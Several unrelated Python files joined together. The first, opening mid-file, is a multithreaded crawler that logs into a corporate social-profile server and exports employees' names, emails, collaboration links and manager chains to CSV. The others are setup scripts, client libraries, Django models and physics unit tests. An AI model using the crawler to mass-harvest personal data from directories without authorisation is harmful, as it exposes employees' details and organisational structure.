			# get date
			dateRelation = entry.getElementsByTagName('updated')[0]
			dateRelation = dateRelation.firstChild.data
			dateRelation = dateRelation[:10]
			# get author user id
			author = entry.getElementsByTagName('author')[0]
			try:
				authorName = author.getElementsByTagName('name')[0]
				authorName = authorName.firstChild.data
			except:
				authorName = ""
			try:
				authorEMail = author.getElementsByTagName('email')[0]
				authorEMail = authorEMail.firstChild.data
			except:
				authorEMail = ""
			authorUserId = author.getElementsByTagName('snx:userid')[0]
			authorUserId = authorUserId.firstChild.data

			# get contributor user id
			contributor = entry.getElementsByTagName('contributor')[0]
			try:
				contribName = contributor.getElementsByTagName('name')[0]
				contribName = contribName.firstChild.data
			except:
				contribName = ""
			try:
				contribEMail = contributor.getElementsByTagName('email')[0]
				contribEMail = contribEMail.firstChild.data
			except:
				contribEMail = ""
			contribUserId = contributor.getElementsByTagName('snx:userid')[0]
			contribUserId = contribUserId.firstChild.data

			# build dict
			authorInfo = { "userid" : authorUserId, "name" : authorName, "email" : authorEMail }
			contribInfo = { "userid" : contribUserId, "name" : contribName, "email" : contribEMail }
			relation = "\"" + authorUserId + "\",\"" + contribUserId + "\",\"<(" + str(dateRelation) + ",Infinity)>\""
			qout.put(authorInfo)
			qout.put(contribInfo)
			qout.put(relation)

		# get manager
		if getManager == True:
			url = server + "/profiles/atom/reportingChain.do?userid=" + userid
			rc = getAtomFeed(url, login, pwd)
			managerId = getManagerInfo(rc)
			if managerId is not None:
				reportingChain = str(userid) + "," + str(managerId)
				qmgmt.put(reportingChain)
			

def printStatusThread(q0, q1, q2, q3):
	strtime = time.time()
	while True:
		sys.stdout.write('\r\x1b[K')
		sys.stdout.write("urls:" + str(q0.qsize()) + " | ")
		sys.stdout.write("userids:" + str(q1.qsize()) + " | ")
		sys.stdout.write("user infos:" + str(q2.qsize()) + " | ")
		sys.stdout.write("manager infos:" + str(q3.qsize()))
		sys.stdout.flush()
		time.sleep(1)

def writeFileThread(usersFilename, relationsFilename, qin):
	# file for user details
	u = open(usersFilename + ".csv", "w")
	u.write("Id,Label,eMail\n")
	# file for relations
	r = open(relationsFilename + ".csv", "w")
	r.write("Source,Target,Time Interval\n")	
	
	doneUsers = []
	while True:
		data = qin.get()
		if data == None:
			u.flush()
			r.flush()
			u.close()
			r.close()
			break
		# write data
		if type(data) is dict:
			string = str(data["userid"]) + ',' + str(data["name"]) + ',' + str(data["email"])
			if string not in doneUsers:
				u.write(string + "\n")
				doneUsers.append(string)
		elif type(data) is str:
			r.write(str(data) + "\n")
		qin.task_done()

def writeManagerFileThread(managerFilename, qin):
	m = open(managerFilename + ".csv", "w")
	m.write("Source,Target\n")
	while True:
		data = qin.get()
		if data == None:
			break
		m.write(str(data) + "\n")
		qin.task_done()
		

def main(argv):
	# global
	serverUrl = ""
	login = ""
	pwd = ""
	getManager = False
	urlQueue = SetQueue(maxsize=5000)
	userIdsQueue = SetQueue(maxsize=5000)
	userInfosQueue = Queue(maxsize=5000)
	userManagerQueue = Queue(maxsize=5000)

	# signal handler
	signal.signal(signal.SIGINT, signal_handler)

	# retrive arguments
	try:
		opts, args = getopt.getopt(argv, "hs:u:p:m", ["help", "server=", "user=", "password=", "manager"])
		for opt, arg in opts:
			if opt in ("-h", "--help"):
				usage()
				sys.exit()
			elif opt in ("-s", "--server"):
				serverUrl = arg
			elif opt in ("-u", "--user"):
				login = arg
			elif opt in ("-p", "--password"):
				pwd = arg
			elif opt in ("-m", "--manager"):
				getManager = True
	except:
		usage()
		sys.exit()

	# threading get userinfo worker
	userIdWorker = []
	for i in range(10):
		w1 = Thread(target=getUserIdsWorker, args=(login, pwd, urlQueue, userIdsQueue,))
		w1.setDaemon(True)
		w1.start()
		userIdWorker.append(w1)

	# threading get relations worker
	userInfoWorker = []
	for i in range(20):
		w2 = Thread(target=getRelationsWorker, args=(serverUrl, login, pwd, userIdsQueue, userInfosQueue, getManager, userManagerQueue,))
		w2.setDaemon(True)
		w2.start()
		userInfoWorker.append(w2)

	# thread to print size of queue
	w3 = Thread(target=printStatusThread, args=(urlQueue, userIdsQueue, userInfosQueue, userManagerQueue,))
	w3.setDaemon(True)
	w3.start()

	# thread to write files
	w4 = Thread(target=writeFileThread, args=("users", "relations", userInfosQueue,))
	w4.setDaemon(True)
	w4.start()

	if getManager == True:
		w5 = Thread(target=writeManagerFileThread, args=("manager", userManagerQueue,))
		w5.setDaemon(True)
		w5.start()

	# build Queue url list
	MAX_TRY = 10
	essai = 0
	while essai < MAX_TRY:
		try:
			buildUrlSearchList(serverUrl, login, pwd, urlQueue)
		except KeyboardInterrupt:
			break
		except:
			essai += 1
			continue
		break

	while not (urlQueue.empty() and userIdsQueue.empty() and userInfosQueue.empty()):
		pass

	print ("end threads")
	urlQueue.put(None)
	userIdsQueue.put(None)
	userInfosQueue.put(None)

	# end of workers
	for i in userIdWorker:
		i.join()
	for i in userInfoWorker:
		i.join()

	time.sleep(5)

	sys.exit(0)


if __name__ == '__main__':
	main(sys.argv[1:])


#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# pkpgcounter : a generic Page Description Language parser
#
# (c) 2003-2009 Jerome Alet <alet@librelogiciel.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# $Id$
#
#

import sys
import glob
import os
import shutil
try :
    from distutils.core import setup
except ImportError as msg :
    sys.stderr.write("%s\n" % msg)
    sys.stderr.write("You need the DistUtils Python module.\nunder Debian, you may have to install the python-dev package.\nOf course, YMMV.\n")
    sys.exit(-1)

try :
    from PIL import Image
except ImportError :
    sys.stderr.write("You need the Python Imaging Library (aka PIL).\nYou can grab it from http://www.pythonware.com\n")
    sys.exit(-1)

sys.path.insert(0, "pkpgpdls")
from pkpgpdls.version import __version__, __doc__

data_files = []
mofiles = glob.glob(os.sep.join(["po", "*", "*.mo"]))
for mofile in mofiles :
    lang = mofile.split(os.sep)[1]
    directory = os.sep.join(["share", "locale", lang, "LC_MESSAGES"])
    data_files.append((directory, [ mofile ]))

docdir = "share/doc/pkpgcounter"
docfiles = ["README", "COPYING", "BUGS", "CREDITS", "AUTHORS", "TODO"]
data_files.append((docdir, docfiles))

if os.path.exists("ChangeLog") :
    data_files.append((docdir, ["ChangeLog"]))

directory = os.sep.join(["share", "man", "man1"])
manpages = glob.glob(os.sep.join(["man", "*.1"]))
data_files.append((directory, manpages))

setup(name = "pkpgcounter", version = __version__,
      license = "GNU GPL",
      description = __doc__,
      author = "Jerome Alet",
      author_email = "alet@librelogiciel.com",
      url = "http://www.pykota.com/software/pkpgcounter/",
      packages = [ "pkpgpdls" ],
      scripts = [ "bin/pkpgcounter" ],
      data_files = data_files)


#!/usr/bin/env python
"""This utility script was adopted from StackExchange:
http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
Adopted for use with arduino_GC connection project
"""

import sys
import glob
import serial


def serial_ports():
    """ Lists serial port names

        :raises EnvironmentError:
            On unsupported or unknown platforms
        :returns:
            A list of the serial ports available on the system
    """
    if sys.platform.startswith('win'):
        ports = ['COM%s' % (i + 1) for i in range(256)]
    elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
        # this excludes your current terminal "/dev/tty"
        ports = glob.glob('/dev/cu[A-Za-z]*')
    elif sys.platform.startswith('darwin'):
        ports = glob.glob('/dev/cu.*')
    else:
        raise EnvironmentError('Unsupported platform')

    result = []
    for port in ports:
        try:
            s = serial.Serial(port)
            s.close()
            result.append(port)
        except (OSError, serial.SerialException):
            pass
    return result


if __name__ == '__main__':
    print(serial_ports())

def _setup_pkgresources():
    import pkg_resources
    import os
    import plistlib

    pl = plistlib.readPlist(os.path.join(
        os.path.dirname(os.getenv('RESOURCEPATH')), "Info.plist"))
    appname = pl.get('CFBundleIdentifier')
    if appname is None:
        appname = pl['CFBundleDisplayName']
    path = os.path.expanduser('~/Library/Caches/%s/python-eggs' % (appname,))
    pkg_resources.set_extraction_path(path)


_setup_pkgresources()

#!/usr/bin/env python
# sample module 
from jira.client import JIRA

def main():
    jira = JIRA()
    JIRA(options={'server': 'http://localhost:8100'})
    projects = jira.projects()
    print projects
    for project in projects:
        print project.key

# Standard boilerplate to call the main() function. 
if __name__ == '__main__':
    main()
""" Class that contains client access to the transformation DB handler. """

__RCSID__ = "$Id$"

import types

from DIRAC                                                  import S_OK, S_ERROR, gLogger
from DIRAC.Core.Base.Client                                 import Client
from DIRAC.Core.Utilities.List                              import breakListIntoChunks
from DIRAC.Resources.Catalog.FileCatalogueBase              import FileCatalogueBase
from DIRAC.ConfigurationSystem.Client.Helpers.Operations    import Operations

rpc = None
url = None

class TransformationClient( Client, FileCatalogueBase ):

  """ Exposes the functionality available in the DIRAC/TransformationHandler

      This inherits the DIRAC base Client for direct execution of server functionality.
      The following methods are available (although not visible here).

      Transformation (table) manipulation

          deleteTransformation(transName)
          getTransformationParameters(transName,paramNames)
          getTransformationWithStatus(status)
          setTransformationParameter(transName,paramName,paramValue)
          deleteTransformationParameter(transName,paramName)

      TransformationFiles table manipulation

          addFilesToTransformation(transName,lfns)
          addTaskForTransformation(transName,lfns=[],se='Unknown')
          getTransformationStats(transName)

      TransformationTasks table manipulation

          setTaskStatus(transName, taskID, status)
          setTaskStatusAndWmsID(transName, taskID, status, taskWmsID)
          getTransformationTaskStats(transName)
          deleteTasks(transName, taskMin, taskMax)
          extendTransformation( transName, nTasks)
          getTasksToSubmit(transName,numTasks,site='')

      TransformationLogging table manipulation

          getTransformationLogging(transName)

      File/directory manipulation methods (the remainder of the interface can be found below)

          getFileSummary(lfns)
          exists(lfns)

      Web monitoring tools

          getDistinctAttributeValues(attribute, selectDict)
          getTransformationStatusCounters()
          getTransformationSummary()
          getTransformationSummaryWeb(selectDict, sortList, startItem, maxItems)
  """

  def __init__( self, **kwargs ):

    Client.__init__( self, **kwargs )
    opsH = Operations()
    self.maxResetCounter = opsH.getValue( 'Productions/ProductionFilesMaxResetCounter', 10 )

    self.setServer( 'Transformation/TransformationManager' )

  def setServer( self, url ):
    self.serverURL = url

  def getCounters( self, table, attrList, condDict, older = None, newer = None, timeStamp = None,
                   rpc = '', url = '' ):
    rpcClient = self._getRPC( rpc = rpc, url = url )
    return rpcClient. getCounters( table, attrList, condDict, older, newer, timeStamp )

  def addTransformation( self, transName, description, longDescription, transType, plugin, agentType, fileMask,
                         transformationGroup = 'General',
                         groupSize = 1,
                         inheritedFrom = 0,
                         body = '',
                         maxTasks = 0,
                         eventsPerTask = 0,
                         addFiles = True,
                         rpc = '', url = '', timeout = 1800 ):
    """ add a new transformation
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addTransformation( transName, description, longDescription, transType, plugin,
                                        agentType, fileMask, transformationGroup, groupSize, inheritedFrom,
                                        body, maxTasks, eventsPerTask, addFiles )

  def getTransformations( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationDate',
                          orderAttribute = None, limit = 100, extraParams = False, rpc = '', url = '', timeout = None ):
    """ gets all the transformations in the system, incrementally. "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    transformations = []
    # getting transformations - incrementally
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformations( condDict, older, newer, timeStamp, orderAttribute, limit,
                                          extraParams, offsetToApply )
      if not res['OK']:
        return res
      else:
        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformations = transformations + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformations )

  def getTransformation( self, transName, extraParams = False, rpc = '', url = '', timeout = None ):
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getTransformation( transName, extraParams )

  def getTransformationFiles( self, condDict = {}, older = None, newer = None, timeStamp = 'LastUpdate',
                              orderAttribute = None, limit = 10000, rpc = '', url = '', timeout = 1800 ):
    """ gets all the transformation files for a transformation, incrementally.
        "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    transformationFiles = []
    # getting transformationFiles - incrementally
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformationFiles( condDict, older, newer, timeStamp, orderAttribute, limit, offsetToApply )
      if not res['OK']:
        return res
      else:
        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformationFiles = transformationFiles + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformationFiles )


  def getTransformationTasks( self, condDict = {}, older = None, newer = None, timeStamp = 'CreationTime',
                              orderAttribute = None, limit = 10000, inputVector = False, rpc = '',
                              url = '', timeout = None ):
    """ gets all the transformation tasks for a transformation, incrementally.
        "limit" here is just used to determine the offset.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    transformationTasks = []
    # getting transformationFiles - incrementally
    offsetToApply = 0
    while True:
      res = rpcClient.getTransformationTasks( condDict, older, newer, timeStamp, orderAttribute, limit,
                                              inputVector, offsetToApply )
      if not res['OK']:
        return res
      else:
        gLogger.verbose( "Result for limit %d, offset %d: %d" % ( limit, offsetToApply, len( res['Value'] ) ) )
        if res['Value']:
          transformationTasks = transformationTasks + res['Value']
          offsetToApply += limit
        if len( res['Value'] ) < limit:
          break
    return S_OK( transformationTasks )

  def cleanTransformation( self, transID, rpc = '', url = '', timeout = None ):
    """ Clean the transformation, and set the status parameter (doing it here, for easier extensibility)
    """
    # Cleaning
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    res = rpcClient.cleanTransformation( transID )
    if not res['OK']:
      return res
    # Setting the status
    return self.setTransformationParameter( transID, 'Status', 'TransformationCleaned' )

  def moveFilesToDerivedTransformation( self, transDict, resetUnused = True ):
    """ move files input to a transformation, to the derived one
    """
    prod = transDict['TransformationID']
    parentProd = int( transDict.get( 'InheritedFrom', 0 ) )
    movedFiles = {}
    if not parentProd:
      gLogger.warn( "[None] [%d] .moveFilesToDerivedTransformation: Transformation was not derived..." % prod )
      return S_OK( ( parentProd, movedFiles ) )
    # get the lfns in status Unused/MaxReset of the parent production
    res = self.getTransformationFiles( condDict = {'TransformationID': parentProd, 'Status': [ 'Unused', 'MaxReset' ]} )
    if not res['OK']:
      gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error getting Unused files from transformation %s:" % ( prod, parentProd ), res['Message'] )
      return res
    parentFiles = res['Value']
    lfns = [lfnDict['LFN'] for lfnDict in parentFiles]
    if not lfns:
      gLogger.info( "[None] [%d] .moveFilesToDerivedTransformation: No files found to be moved from transformation %d" % ( prod, parentProd ) )
      return S_OK( ( parentProd, movedFiles ) )
    # get the lfns of the derived production that were Unused/MaxReset in the parent one
    res = self.getTransformationFiles( condDict = { 'TransformationID': prod, 'LFN': lfns} )
    if not res['OK']:
      gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error getting files from derived transformation" % prod, res['Message'] )
      return res
    derivedFiles = res['Value']
    suffix = '-%d' % parentProd
    derivedStatusDict = dict( [( derivedDict['LFN'], derivedDict['Status'] ) for derivedDict in derivedFiles] )
    newStatusFiles = {}
    parentStatusFiles = {}
    force = False
    for parentDict in parentFiles:
      lfn = parentDict['LFN']
      derivedStatus = derivedStatusDict.get( lfn )
      if derivedStatus:
        parentStatus = parentDict['Status']
        if resetUnused and parentStatus == 'MaxReset':
          status = 'Unused'
          moveStatus = 'Unused from MaxReset'
          force = True
        else:
          status = parentStatus
          moveStatus = parentStatus
        if derivedStatus.endswith( suffix ):
          # This file is Unused or MaxReset while it was most likely Assigned at the time of derivation
          parentStatusFiles.setdefault( 'Moved-%s' % str( prod ), [] ).append( lfn )
          newStatusFiles.setdefault( ( status, parentStatus ), [] ).append( lfn )
          movedFiles[moveStatus] = movedFiles.setdefault( moveStatus, 0 ) + 1
        elif parentDict['Status'] == 'Unused':
          # If the file was Unused already at derivation time, set it NotProcessed
          parentStatusFiles.setdefault( 'NotProcessed', [] ).append( lfn )

    # Set the status in the parent transformation first
    for status, lfnList in parentStatusFiles.items():
      for lfnChunk in breakListIntoChunks( lfnList, 5000 ):
        res = self.setFileStatusForTransformation( parentProd, status, lfnChunk )
        if not res['OK']:
          gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files in transformation %d "
                         % ( prod, status, len( lfnList ), parentProd ),
                         res['Message'] )

    # Set the status in the new transformation
    for ( status, oldStatus ), lfnList in newStatusFiles.items():
      for lfnChunk in breakListIntoChunks( lfnList, 5000 ):
        res = self.setFileStatusForTransformation( prod, status, lfnChunk, force = force )
        if not res['OK']:
          gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files; resetting them %s in transformation %d"
                         % ( prod, status, len( lfnChunk ), oldStatus, parentProd ),
                         res['Message'] )
          res = self.setFileStatusForTransformation( parentProd, oldStatus, lfnChunk )
          if not res['OK']:
            gLogger.error( "[None] [%d] .moveFilesToDerivedTransformation: Error setting status %s for %d files in transformation %d"
                           % ( prod, oldStatus, len( lfnChunk ), parentProd ),
                           res['Message'] )

    return S_OK( ( parentProd, movedFiles ) )

  def setFileStatusForTransformation( self, transName, newLFNsStatus = {}, lfns = [], force = False,
                                          rpc = '', url = '', timeout = 120 ):
    """ sets the file status for LFNs of a transformation

        For backward compatibility purposes, the status and LFNs can be passed in 2 ways:
        - newLFNsStatus is a dictionary with the form:
          {'/this/is/an/lfn1.txt': 'StatusA', '/this/is/an/lfn2.txt': 'StatusB',  ... }
          and at this point lfns is not considered
        - newLFNStatus is a string, that applies to all the LFNs in lfns
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    # create dictionary in case newLFNsStatus is a string
    if type( newLFNsStatus ) == type( '' ):
      newLFNsStatus = dict( [( lfn, newLFNsStatus ) for lfn in lfns ] )

    # gets status as of today
    tsFiles = self.getTransformationFiles( {'TransformationID':transName, 'LFN': newLFNsStatus.keys()} )
    if not tsFiles['OK']:
      return tsFiles
    tsFiles = tsFiles['Value']
    if tsFiles:
      # for convenience, makes a small dictionary out of the tsFiles, with the lfn as key
      tsFilesAsDict = {}
      for tsFile in tsFiles:
        tsFilesAsDict[tsFile['LFN']] = [tsFile['Status'], tsFile['ErrorCount'], tsFile['FileID']]

      # applying the state machine to the proposed status
      newStatuses = self._applyTransformationFilesStateMachine( tsFilesAsDict, newLFNsStatus, force )

      if newStatuses:  # if there's something to update
        # must do it for the file IDs...
        newStatusForFileIDs = dict( [( tsFilesAsDict[lfn][2], newStatuses[lfn] ) for lfn in newStatuses.keys()] )
        res = rpcClient.setFileStatusForTransformation( transName, newStatusForFileIDs )
        if not res['OK']:
          return res

    return S_OK( newStatuses )

  def _applyTransformationFilesStateMachine( self, tsFilesAsDict, dictOfProposedLFNsStatus, force ):
    """ For easier extension, here we apply the state machine of the production files.
        VOs might want to replace the standard here with something they prefer.

        tsFiles is a dictionary with the lfn as key and as value a list of [Status, ErrorCount, FileID]
        dictOfNewLFNsStatus is a dictionary with the proposed status
        force is a boolean

        It returns a dictionary with the status updates
    """
    newStatuses = {}

    for lfn in dictOfProposedLFNsStatus.keys():
      if lfn not in tsFilesAsDict.keys():
        continue
      else:
        newStatus = dictOfProposedLFNsStatus[lfn]
        # Apply optional corrections
        if tsFilesAsDict[lfn][0].lower() == 'processed' and dictOfProposedLFNsStatus[lfn].lower() != 'processed':
          if not force:
            newStatus = 'Processed'
        elif tsFilesAsDict[lfn][0].lower() == 'maxreset':
          if not force:
            newStatus = 'MaxReset'
        elif dictOfProposedLFNsStatus[lfn].lower() == 'unused':
          errorCount = tsFilesAsDict[lfn][1]
          # every 10 retries (by default)
          if errorCount and ( ( errorCount % self.maxResetCounter ) == 0 ):
            if not force:
              newStatus = 'MaxReset'

        if tsFilesAsDict[lfn][0].lower() != newStatus:
          newStatuses[lfn] = newStatus

    return newStatuses

  def setTransformationParameter( self, transID, paramName, paramValue, force = False,
                                      rpc = '', url = '', timeout = 120 ):
    """ Sets a transformation parameter. There's a special case when coming to setting the status of a transformation.
    """
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )

    if paramName.lower() == 'status':
      # get transformation Type
      transformation = self.getTransformation( transID )
      if not transformation['OK']:
        return transformation
      transformationType = transformation['Value']['Type']

      # get status as of today
      originalStatus = self.getTransformationParameters( transID, 'Status' )
      if not originalStatus['OK']:
        return originalStatus
      originalStatus = originalStatus['Value']

      transIDAsDict = {transID: [originalStatus, transformationType]}
      dictOfProposedstatus = {transID: paramValue}
      # applying the state machine to the proposed status
      value = self._applyTransformationStatusStateMachine( transIDAsDict, dictOfProposedstatus, force )
    else:
      value = paramValue

    return rpcClient.setTransformationParameter( transID, paramName, value )

  def _applyTransformationStatusStateMachine( self, transIDAsDict, dictOfProposedstatus, force ):
    """ For easier extension, here we apply the state machine of the transformation status.
        VOs might want to replace the standard here with something they prefer.

        transIDAsDict is a dictionary with the transID as key and as value a list with [Status, Type]
        dictOfProposedstatus is a dictionary with the proposed status
        force is a boolean

        It returns the new status (the standard is just doing nothing: everything is possible)
    """
    return dictOfProposedstatus.values()[0]

  #####################################################################
  #
  # These are the file catalog interface methods
  #

  def isOK( self ):
    return self.valid

  def getName( self, DN = '' ):
    """ Get the file catalog type name
    """
    return self.name

  def addDirectory( self, path, force = False, rpc = '', url = '', timeout = None ):
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addDirectory( path, force )

  def getReplicas( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfns = res['Value'].keys()
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getReplicas( lfns )

  def addFile( self, lfn, force = False, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addFile( lfndicts, force )

  def addReplica( self, lfn, force = False, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.addReplica( lfndicts, force )

  def removeFile( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfns = res['Value'].keys()
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    successful = {}
    failed = {}
    listOfLists = breakListIntoChunks( lfns, 100 )
    for fList in listOfLists:
      res = rpcClient.removeFile( fList )
      if not res['OK']:
        return res
      successful.update( res['Value']['Successful'] )
      failed.update( res['Value']['Failed'] )
    resDict = {'Successful': successful, 'Failed':failed}
    return S_OK( resDict )

  def removeReplica( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndicts = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    successful = {}
    failed = {}
    # as lfndicts is a dict, the breakListIntoChunks will fail. Fake it!
    listOfDicts = []
    localdicts = {}
    for lfn, info in lfndicts.items():
      localdicts.update( { lfn : info } )
      if len( localdicts.keys() ) % 100 == 0:
        listOfDicts.append( localdicts )
        localdicts = {}
    for fDict in listOfDicts:
      res = rpcClient.removeReplica( fDict )
      if not res['OK']:
        return res
      successful.update( res['Value']['Successful'] )
      failed.update( res['Value']['Failed'] )
    resDict = {'Successful': successful, 'Failed':failed}
    return S_OK( resDict )

  def getReplicaStatus( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.getReplicaStatus( lfndict )

  def setReplicaStatus( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.setReplicaStatus( lfndict )

  def setReplicaHost( self, lfn, rpc = '', url = '', timeout = None ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    lfndict = res['Value']
    rpcClient = self._getRPC( rpc = rpc, url = url, timeout = timeout )
    return rpcClient.setReplicaHost( lfndict )

  def removeDirectory( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def createDirectory( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def createLink( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def removeLink( self, lfn, rpc = '', url = '', timeout = None ):
    return self.__returnOK( lfn )

  def __returnOK( self, lfn ):
    res = self.__checkArgumentFormat( lfn )
    if not res['OK']:
      return res
    successful = {}
    for lfn in res['Value'].keys():
      successful[lfn] = True
    resDict = {'Successful':successful, 'Failed':{}}
    return S_OK( resDict )

  def __checkArgumentFormat( self, path ):
    if type( path ) in types.StringTypes:
      urls = {path:False}
    elif type( path ) == types.ListType:
      urls = {}
      for url in path:
        urls[url] = False
    elif type( path ) == types.DictType:
      urls = path
    else:
      return S_ERROR( "TransformationClient.__checkArgumentFormat: Supplied path is not of the correct format." )
    return S_OK( urls )

from django.db import models
from django.contrib.auth.models import User
import MySQLdb

# Create your models here.

class Comentario(models.Model):
	"""Comentario"""
	contenido = models.TextField(help_text='Escribe un comentario')
	fecha_coment = models.DateField(auto_now=True)

	def __unicode__(self):
		return self.contenido
class Estado(models.Model):
	"""Estado"""
	nom_estado = models.CharField(max_length=50)

	def __unicode__(self):
		return nom_estado

class Categoria(models.Model):
	"""Categoria"""
	nombre = models.CharField(max_length=50)
	descripcion = models.TextField(help_text='Escribe una descripcion de la categoria')

class Entrada(models.Model):
	"""Entrada"""
	autor = models.ForeignKey(User)
	comentario = models.ForeignKey(Comentario)
	estado =  models.ForeignKey(Estado)
	titulo = models.CharField(max_length=100)
	contenido = models.TextField(help_text='Redacta el contenido')
	fecha_pub = models.DateField(auto_now=True)

	def __unicode__(self):
		return self.titulo

class Agregador(models.Model):
	"""agreador"""
	entrada = models.ForeignKey(Entrada)
	categoria = models.ManyToManyField(Categoria)
import unittest
from itertools import izip

import numpy as np
from numpy import cos, sin, pi

from pele.angleaxis import RBTopology, RigidFragment, RBPotentialWrapper
from pele.potentials import LJ
from pele.angleaxis._otp_cluster import OTPCluster
from pele.thermodynamics import get_thermodynamic_information
from pele.utils import rotations
from pele.angleaxis._aa_utils import _rot_mat_derivative, _sitedist_grad, _sitedist
from pele.angleaxis.aamindist import MeasureRigidBodyCluster


_x03 = np.array([2.550757898788, 2.591553038507, 3.696836364193, 
                2.623281513163, 3.415794212648, 3.310786279789, 
                1.791383852327, 2.264321752809, 4.306217333671, 
                0.761945654023, -0.805817782109, 1.166981882601, 
                0.442065301864, -2.747066418223, -1.784325262714, 
                -1.520905562598, 0.403670860200, -0.729768985400])
_x03_atomistic = np.array([3.064051819556, 2.474533745459, 3.646107658946,
                            2.412011983074, 2.941152759499, 4.243695098053, 
                            2.176209893734, 2.358972610563, 3.200706335581, 
                            2.786627589565, 3.211876105193, 2.850924310983, 
                            1.962626909252, 3.436918873216, 3.370903763850,
                            3.120590040673, 3.598587659535, 3.710530764535, 
                            1.697360211099, 2.317229950712, 4.823998989452, 
                            2.283487958310, 1.840698306602, 4.168734267290, 
                            1.393303387573, 2.635037001113, 3.925918744272
                           ])

class TestOTPExplicit(unittest.TestCase):
    
    def make_otp(self):
        """this constructs a single OTP molecule"""
        otp = RigidFragment()
        otp.add_atom("O", np.array([0.0, -2./3 * np.sin( 7.*pi/24.), 0.0]), 1.)
        otp.add_atom("O", np.array([cos( 7.*pi/24.),  1./3. * sin( 7.* pi/24.), 0.0]), 1.)
        otp.add_atom("O", np.array([-cos( 7.* pi/24.),  1./3. * sin( 7.*pi/24), 0.0]), 1.)
        otp.finalize_setup()
        return otp

    
    def setUp(self):
        nrigid = 3
        self.topology = RBTopology()
        self.topology.add_sites([self.make_otp() for i in xrange(nrigid)])
        self.topology.finalize_setup()
        
        cartesian_potential = LJ()
        self.pot = RBPotentialWrapper(self.topology, cartesian_potential)
        
        self.x0 = _x03
        self.x0 = np.array(self.x0)
        self.e0 = -17.3387670023
        assert nrigid * 6 == self.x0.size
        
        self.x0atomistic = _x03_atomistic
        self.nrigid = nrigid
    
    def test_energy(self):
        e = self.pot.getEnergy(self.x0)
        self.assertAlmostEqual(e, self.e0, delta=1e-4)

    def test_energy_gradient(self):
        e = self.pot.getEnergy(self.x0)
        gnum = self.pot.NumericalDerivative(self.x0)
         
        e2, g = self.pot.getEnergyGradient(self.x0)
        self.assertAlmostEqual(e, e2, delta=1e-4)
         
        for i in xrange(g.size):
            self.assertAlmostEqual(g[i], gnum[i], 2)
    
    def test_to_atomistic(self):
        xatom = self.topology.to_atomistic(self.x0).flatten()
        for i in xrange(xatom.size):
            self.assertAlmostEqual(xatom[i], self.x0atomistic[i], 2)
    
    def test_site_to_atomistic(self):
        rf = self.make_otp()
        p = np.array([1., 2, 3])
        p /= np.linalg.norm(p)
        com = np.array([4., 5, 6])
        print "otp to atomistic"
        print rf.to_atomistic(com, p)
        

        print "otp transform grad"
